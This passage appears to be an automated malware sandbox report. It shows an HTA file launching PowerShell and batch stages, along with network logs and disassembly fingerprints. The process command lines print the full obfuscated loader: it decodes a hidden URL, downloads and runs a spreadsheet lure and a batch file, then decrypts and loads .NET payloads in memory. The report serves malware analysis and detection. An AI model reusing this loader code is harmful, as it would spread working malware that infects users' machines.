                                                        2024-04-20 14:06:15 UTC1523INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 37 30 30 31 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 47 72 61 70 68 69 63 73 2e 47 56 69 7a 49 6e 6b 53 74 72 6f 6b 65 22 20 41 54 54 3d 22 63 66 63 66 64 62 39 31 63 36 38 63 34 33 32 39 62 62 38 62 37 63 62 37 62 61 62 62 33 63 66 37 2d 65 30 38 32 63 32 66 32 2d 65 66 31 64 2d 34 32 37 61 2d 61 63 34 64 2d 62 30 62 37 30 30 61 66 65 37 61 37 2d 37 36 35 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="170012" V="10" DC="SM" EN="Office.Graphics.GVizInkStroke" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" SP="CriticalBusinessImpact" DCa="PSU" xmlns=""> <S> <UTS T


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.44975513.107.246.414437500C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                        TimestampBytes transferredDirectionData
                                                        2024-04-20 14:06:15 UTC206OUTGET /rules/rule63067v4s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-04-20 14:06:15 UTC584INHTTP/1.1 200 OK
                                                        Date: Sat, 20 Apr 2024 14:06:15 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 2871
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:28:05 GMT
                                                        ETag: "0x8DC582BEC5E84E0"
                                                        x-ms-request-id: 8663ad55-801e-006f-547c-911ec5000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20240420T140615Z-15497cdd9fd6xqg2gux9dtkys400000003c00000000081qu
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-04-20 14:06:15 UTC2871INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 36 33 30 36 37 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 49 64 65 6e 74 69 74 79 2e 53 73 70 69 50 72 6f 6d 70 74 57 69 6e 33 32 22 20 41 54 54 3d 22 35 63 36 35 62 62 63 34 65 64 62 66 34 38 30 64 39 36 33 37 61 63 65 30 34 64 36 32 62 64 39 38 2d 31 32 38 34 34 38 39 33 2d 38 61 62 39 2d 34 64 64 65 2d 62 38 35 30 2d 35 36 31 32 63 62 31 32 65 30 66 32 2d 37 38 32 32 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="63067" V="4" DC="SM" EN="Office.Identity.SspiPromptWin32" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <S>


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:16:05:02
                                                        Start date:20/04/2024
                                                        Path:C:\Windows\SysWOW64\mshta.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:mshta.exe "C:\Users\user\Desktop\hta.hta"
                                                        Imagebase:0xf70000
                                                        File size:13'312 bytes
                                                        MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:1
                                                        Start time:16:05:02
                                                        Start date:20/04/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;
                                                        Imagebase:0xab0000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:16:05:02
                                                        Start date:20/04/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:16:05:04
                                                        Start date:20/04/2024
                                                        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Roaming\jiteon.xlsx"
                                                        Imagebase:0xab0000
                                                        File size:53'161'064 bytes
                                                        MD5 hash:4A871771235598812032C822E6F68F19
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:false

                                                        General

                                                        Target ID:4
                                                        Start time:16:05:05
                                                        Start date:20/04/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\GoGi.bat" "
                                                        Imagebase:0x240000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:16:05:05
                                                        Start date:20/04/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:16:05:05
                                                        Start date:20/04/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\GoGi.bat"
                                                        Imagebase:0x240000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:7
                                                        Start time:16:05:05
                                                        Start date:20/04/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:8
                                                        Start time:16:05:05
                                                        Start date:20/04/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); "
                                                        Imagebase:0x240000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:9
                                                        Start time:16:05:05
                                                        Start date:20/04/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Imagebase:0xab0000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:10
                                                        Start time:16:05:07
                                                        Start date:20/04/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                        Imagebase:0xab0000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:11
                                                        Start time:16:05:07
                                                        Start date:20/04/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:15
                                                        Start time:16:06:10
                                                        Start date:20/04/2024
                                                        Path:C:\Windows\splwow64.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\splwow64.exe 12288
                                                        Imagebase:0x7ff72b520000
                                                        File size:163'840 bytes
                                                        MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Executed Functions

                                                          Function 07E11A10 Relevance: 7.8, Strings: 6, Instructions: 272COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1783048809.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7e10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,etq$tP^q$tP^q$$^q$$^q$$^q
                                                          • API String ID: 0-3120554246
                                                          • Opcode ID: 291552da7649acf9c132f06f51a6438e7d7f044d890217ce98a2659f3bc7e895
                                                          • Instruction ID: 93929175872f31e6ce826bc4c1e562257bb20608d8f7b09cc9c2bdf431724470
                                                          • Opcode Fuzzy Hash: 291552da7649acf9c132f06f51a6438e7d7f044d890217ce98a2659f3bc7e895
                                                          • Instruction Fuzzy Hash: 729127B0B0120D9FCB18DB688405BAABFE2AFC5314F1495A9E6059F391DB32DC85C7A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07E11518 Relevance: 6.6, Strings: 5, Instructions: 362COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1783048809.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7e10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                          • API String ID: 0-3272787073
                                                          • Opcode ID: 5f56d7e565aea6686a4fead309cfa39be0f92d53f21c5044ba73c644390c8a50
                                                          • Instruction ID: 7bf7bc98f4c81fda364416796334c9b3e182f0f4a009b13a639f90c21fe72876
                                                          • Opcode Fuzzy Hash: 5f56d7e565aea6686a4fead309cfa39be0f92d53f21c5044ba73c644390c8a50
                                                          • Instruction Fuzzy Hash: 98C159B0B0530E9FCB149B79D4017AABBE2AFC2214F18D56AD615CF391DB36C885C792
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07E119F1 Relevance: 3.9, Strings: 3, Instructions: 161COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1783048809.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7e10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tP^q$$^q$$^q
                                                          • API String ID: 0-1983491577
                                                          • Opcode ID: d898b3ed5f0c4cd75be34e55045e2afc148e242f365f6e30fdd2010e7a5c5339
                                                          • Instruction ID: 6f32225e40f4a3a6c80e4781c14e9695274c97faee60041daa323f5ce1d9254a
                                                          • Opcode Fuzzy Hash: d898b3ed5f0c4cd75be34e55045e2afc148e242f365f6e30fdd2010e7a5c5339
                                                          • Instruction Fuzzy Hash: 7C51C2B0B0620DDFCB28CF69C545BA9BBE2AF85214F19D19AD6049F251D732DC84CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07E11688 Relevance: 3.8, Strings: 3, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1783048809.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7e10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q$$^q$$^q
                                                          • API String ID: 0-2291298209
                                                          • Opcode ID: aa75acfd78da056f87dd1a3f6f58b1c336c93f78225b4324ff223d5c6311b524
                                                          • Instruction ID: f407c10f9a207333ed73e8b9d5e97de3944a97dd8c3135bfcc749eba3f938306
                                                          • Opcode Fuzzy Hash: aa75acfd78da056f87dd1a3f6f58b1c336c93f78225b4324ff223d5c6311b524
                                                          • Instruction Fuzzy Hash: 47310AF0A1230EDBCF249E25C4027B977E5AF82258F589125DA059F391EB3ACDC0C762
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036AA840 Relevance: 3.2, Strings: 2, Instructions: 669COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759607888.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_36a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (Xcq$LR^q
                                                          • API String ID: 0-2856513941
                                                          • Opcode ID: a2de8d76d0f1cbd3627cc87936ef71e86749a55cfd211fc56ae709dcf5db79cf
                                                          • Instruction ID: 1078fcdb819c078688a10259416e5d5e6003d04e20cc0d5cb808a538cdfe313a
                                                          • Opcode Fuzzy Hash: a2de8d76d0f1cbd3627cc87936ef71e86749a55cfd211fc56ae709dcf5db79cf
                                                          • Instruction Fuzzy Hash: 13525834B00218CFDB24DB68C994BADBBB2AF85300F1581A9D8499B3A5DF74DD85CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036AA4CC Relevance: 3.1, Strings: 2, Instructions: 575COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759607888.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_36a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (Xcq$LR^q
                                                          • API String ID: 0-2856513941
                                                          • Opcode ID: 539c6b40e9b502fcda70f7722b6ebd237033229e6e36b8132e7f522d56b0b3b1
                                                          • Instruction ID: f039414c8d610de0b8a24052fc177fa181ae63feea8ac068a4b9f0b449db3cd4
                                                          • Opcode Fuzzy Hash: 539c6b40e9b502fcda70f7722b6ebd237033229e6e36b8132e7f522d56b0b3b1
                                                          • Instruction Fuzzy Hash: 5B516934A003188FDB24CB68C854BADBBB2EF89700F1145AAE545AF3A5DB719D42CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07E10900 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1783048809.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7e10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tP^q$tP^q
                                                          • API String ID: 0-309238000
                                                          • Opcode ID: b5de483cc300c8a7109ff4e46ca7206884133470e51bffb90b0f0c7e3c636800
                                                          • Instruction ID: a0d4277d53624fe864de49745157767966140546b9c51bd22860a803e33739c9
                                                          • Opcode Fuzzy Hash: b5de483cc300c8a7109ff4e46ca7206884133470e51bffb90b0f0c7e3c636800
                                                          • Instruction Fuzzy Hash: 715174B1B052559FC7259B68C8206AABFE5AFC9314F18C46ED588CF241CA32C8C5C3A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036AA008 Relevance: .3, Instructions: 322COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759607888.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_36a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a42c7ed479e3bd85d855f19b8ab791ae50339078cc7a39e339f2fe557d2fbdef
                                                          • Instruction ID: 5e270067c76885d8f7b32aec1a72e660d842f85cdd6a3a95f346daac7def83b7
                                                          • Opcode Fuzzy Hash: a42c7ed479e3bd85d855f19b8ab791ae50339078cc7a39e339f2fe557d2fbdef
                                                          • Instruction Fuzzy Hash: 10D1F674A00258AFCB05CF98D584AADFBB2FF89310F28815AE845AB355C735ED85CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036A8320 Relevance: .3, Instructions: 260COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759607888.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_36a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d0f59c700b857cbb7ab2ddbd6d5adf89e05e8e1ce09f06ef6ce476bf73c6bd85
                                                          • Instruction ID: 716e6f42a07f5fe68c98928782eaecc9e4a300afc1d57adb463e5d2cc216ddfb
                                                          • Opcode Fuzzy Hash: d0f59c700b857cbb7ab2ddbd6d5adf89e05e8e1ce09f06ef6ce476bf73c6bd85
                                                          • Instruction Fuzzy Hash: 98B1E534A01618AFDB15CF98D584A9DFBB2FF88310F298559E804AB365C731ED86CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036A29F0 Relevance: .2, Instructions: 241COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759607888.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_36a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4bc55e4fb79787712e96d8b427a33195dfc9fc89b58ea65e44da7770227e7dad
                                                          • Instruction ID: 506babeb0c8bd34dba286d5f2613fc9fbd87666023738552dfb5aa21815094a2
                                                          • Opcode Fuzzy Hash: 4bc55e4fb79787712e96d8b427a33195dfc9fc89b58ea65e44da7770227e7dad
                                                          • Instruction Fuzzy Hash: 5AA18C70A406058FCB15CF5CC5949AAFBB1FF88310B288AA9D916AB365C736EC51CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036A6EE8 Relevance: .2, Instructions: 202COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759607888.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_36a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7530679deecdd3f9afa8c74c0d957dea485eebf5947d65073ef613e03f360b5f
                                                          • Instruction ID: 50da03f889fcc75a56b7b0a4956e149fd65df5dceb6bd71d8557c4f6e31cb12f
                                                          • Opcode Fuzzy Hash: 7530679deecdd3f9afa8c74c0d957dea485eebf5947d65073ef613e03f360b5f
                                                          • Instruction Fuzzy Hash: 4C718E34A15644DFCB15CFA8D9849AEBBF2FF89210F1984A9E4059B362CB35EC85CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036A8535 Relevance: .1, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1759607888.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_36a0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ac796f39a9a4044d9219e69427e61795b919159c452c8981aad4b86ac536a61c
                                                          • Instruction ID: 4312526539ff754d16fcbd46129348ab347a108da5188e42c0dc6b0ddb8a2eb1
                                                          • Opcode Fuzzy Hash: ac796f39a9a4044d9219e69427e61795b919159c452c8981aad4b86ac536a61c
                                                          • Instruction Fuzzy Hash: C551C534A00208AFDB05CB98D594A9DFBF2FF88314F288559E805AB365C735ED86CF90
                                                          Uniqueness

